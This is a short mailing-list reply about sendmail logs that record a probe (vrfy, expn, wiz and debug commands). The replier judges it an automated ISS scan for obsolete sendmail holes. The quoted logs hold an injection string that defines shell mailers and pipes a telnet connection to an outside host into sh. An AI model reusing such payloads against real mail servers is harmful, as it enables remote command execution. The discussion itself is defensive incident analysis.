Re: sendmail attack?

[Al Huger - Mail Account <ah1 () SECURITYFOCUS COM>]

> (xxx.xxx.xxx.xxx)
> Dec  9 01:01:24 main sendmail[863]: BAA00863: "debug" command from
> Dial22.xxx.xxx [xxx.xxx.xxx.xxx]
> (xxx.xxx.xxx.xxx)
> Dec  9 00:43:01 main sendmail[809]: NOQUEUE: POSSIBLE ATTACK from
> Dial22.xxx.xxx: newline in string "iss^M
> Croot^M Mprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u^M Mlocal, P=/bin/sh,
> F=lsDFMeu, A=sh -c $u^M R<"|/... Vulnerable |
> mail ">^M R<"|( sleep 2 ; echo quit ) |telnet xxx.xxx.xxx.xxx 5701 | sh
> > > /tmp/tel.out "
> Dec  9 01:01:05 main sendmail[856]: NOQUEUE: Dial22.xxx.xxx
> [xxx.xxx.xxx.xxx]: vrfy root
> Dec  9 01:01:06 main sendmail[857]: NOQUEUE: Dial22.xxx.xxx
> [xxx.xxx.xxx.xxx]: expn root
> Dec  9 01:01:06 main sendmail[858]: NOQUEUE: Dial22.xxx.xxx
> [xxx.xxx.xxx.xxx]: expn decode
> Dec  9 01:01:19 main sendmail[860]: NOQUEUE: "wiz" command from
> Dial22.xxx.xxx [xxx.xxx.xxx.xxx]
> (xxx.xxx.xxx.xxx)
> Dec  9 01:01:24 main sendmail[863]: BAA00863: "debug" command from
> Dial22.xxx.xxx [xxx.xxx.xxx.xxx]
> (xxx.xxx.xxx.xxx)
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-
>
> Obviously is a sendmail attack try. Any suggestions, comments ?


That is most likely someone scanning you with the ISS Scanner. I am not
clear whether that is the freeware version of the commercial one.

Either way, it's an automated scan looking for really, really depracated
ancient sendmail holes which I am sure you do not have.


-al